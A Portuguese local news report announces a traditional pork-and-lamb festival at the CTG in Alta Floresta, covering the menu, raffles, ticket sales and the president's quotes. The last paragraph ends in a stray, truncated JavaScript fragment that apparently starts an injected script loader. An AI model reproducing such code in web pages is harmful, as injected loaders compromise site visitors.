Capa / Eventos / Tradicional Festa do Leitão & Carneiro acontece neste domingo

Tradicional Festa do Leitão & Carneiro acontece neste domingo

ctg-midiaDionéia Martins

Neste domingo, 13, acontece no Clube de Tradições Gaúchas – CTG Alta Floresta, a 7ª edição da Festa do Leitão & Carneiro. O evento que já se tornou tradição neste mês este ano vem recheado de novidades.

A festa do Leitão & Carneiro, é realizada em homenagem a semana Farroupilha. No sábado, 12, um grandiosos baile da melhor idade, terá início as comemorações. No domingo um almoço para cerca de 500 pessoas onde será servido o carneiro a caçadora e assado, o porco assado e a paraguaia.

Segundo o presidente do CTG, Jaime Garcia, várias parcerias com o comércio local foram feitas, e diversos brindes vão ser sorteados durante o dia. O frigorífico Bonanza estará com uma mesa de degustação da sua linha de produtos. Linguiça, salame e torresmo, são alguns dos produtos que estarão sendo ofertados na versão degustação para o público presente.

Além do almoço será realizado o sorteio de prêmios e degustação dos embutidos havera, uma premiação para o casal mais animado da festa. No período da manhã acontecerá um torneio de natação com atletas de Alta Floresta e municípios vizinhos.

“Essa festa vai ser bem diferenciada, durante o dia vai ter vários gaiteiros da região tocando, E todo o dinheiro vai ser para a reforma do toboágua que já está sendo reformada”, disse Jaime Garcia. Cerca de 400 convites já foram vendidos. “Ainda resta uns 100 convites, ainda dá tempo de adquirir, e a festa vai ser a melhor de todas”, pontuou o Presidente.

Os ingressos estão sendo vendidos no escritório do CTG e na Star Net pelo preço de R$ 25,00. Para Jaime esta é uma festa voltada para as famílias altaflorestense. “Este é um momento de tradição e alegria e nós chamamos e convidamos as famílias de Alta Floresta que goste de se divertir em família, é um ambiente que nós estamos proporcionando para que as famílias se divirtam”, convidou.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top